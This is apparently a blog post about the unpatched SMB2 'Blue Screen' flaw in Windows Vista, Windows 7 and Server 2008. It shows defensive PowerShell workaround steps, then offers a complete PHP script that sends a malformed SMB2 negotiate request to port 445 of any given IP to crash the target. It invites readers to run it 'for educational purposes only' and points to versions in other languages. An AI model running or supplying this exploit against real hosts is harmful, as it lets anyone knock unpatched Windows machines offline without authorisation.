Blue Screen of Shame

Once more Microsoft has done something great.

The SMB2 exploit, which some may know as the Blue Screen Vista Exploit, has not yet been patched and will not be soon.

No Emergency Patch For Latest Windows Exploit

The workaround Microsoft has published for the SMB2 issue, instead of a patch, is to turn off your file sharing or turn on your firewall.
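To apply those two published workarounds on a Vista / Windows 7 / Server 2008 host, here is an added example that is not from the original post; it assumes an elevated PowerShell prompt and relies on netsh and the LanmanServer (Server) service, both of which those Windows versions ship with:

```powershell
# Added example, not part of the original post: apply Microsoft's two
# workarounds for the SMB2 issue on a single host. Run as Administrator.

# 1. "Turn on your firewall": enable the Windows Firewall on every profile
#    and add an explicit inbound block for SMB over TCP 445.
netsh advfirewall set allprofiles state on
netsh advfirewall firewall add rule name="Block inbound SMB (TCP 445)" `
    dir=in action=block protocol=TCP localport=445

# 2. "Turn off your file sharing": stop the Server service (LanmanServer),
#    which provides SMB file and printer sharing, and keep it from starting.
Stop-Service -Name LanmanServer -Force
Set-Service  -Name LanmanServer -StartupType Disabled

# Verify: after both steps nothing should be listening on TCP 445.
netstat -an | Select-String ":445 "
```

To undo the change later, delete the firewall rule with `netsh advfirewall firewall delete rule name="Block inbound SMB (TCP 445)"` and set LanmanServer back to Automatic.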

So you may use this exploit, of course for educational purposes only, and maybe to inform Microsoft of how annoying this exploit could be.

So I've managed to find/make a PHP script to do so and run it on my Mac with the php command. This code could run on an iPhone with some modifications.

You may save this file (e.g. bsod.php) and run it like this:

php ./bsod.php [IP]

The file would then be as follows:


<?php
/*
* Lame Windows Vista / Windows 7 / Win2k8 R1 SP2+updates and beta R2 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD
* Author: Ricardo Almeida
* email:  ricardojba[at]aeiou[DoT]pt
*
* Credits: http://seclists.org/fulldisclosure/2009/Sep/0039.html (exploit ported to PHP)
*
*/
// Expect exactly one argument: the target host name or IP address.
if ($argc != 2) {die("Usage: php lame-smb-bsod.php [IP]\n");}
$host = $argv[1];
// NetBIOS session header followed by the SMB NEGOTIATE PROTOCOL REQUEST
// taken from the advisory credited above.
$payload = "\x00\x00\x00\x90".
"\xff\x53\x4d\x42".
"\x72\x00\x00\x00".
"\x00\x18\x53\xc8".
"\x00\x26".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe".
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54".
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31".
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00".
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57".
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61".
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c".
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c".
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e".
"\x30\x30\x32\x00";
// Open a TCP connection to the SMB port (445); stop if the socket cannot be
// created or the connection fails instead of writing to a dead socket.
$mysock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($mysock === false) die("socket_create failed: " . socket_strerror(socket_last_error()) . "\n");
$result = socket_connect($mysock, $host, 445);
if ($result === false) die("Connect failed.\nReason: " . socket_strerror(socket_last_error($mysock)) . "\n");
echo "\nConnected to $host\n";
echo "Bye, Bye Windowz...\n";
// Send the request and close the connection.
socket_write($mysock, $payload, strlen($payload));
socket_close($mysock);
?>

A full, detailed article about the Windows SMB2 exploit: SMB2 Exploitation Guide for Housekeepers & Dummies!

If you want this exploit in other programming languages: http://lmgtfy.com/?q=smb2+exploit+code

One Response to “Blue Screen of Shame”

  1. Thanks for spending the time to make clear the terminology to the beginners!
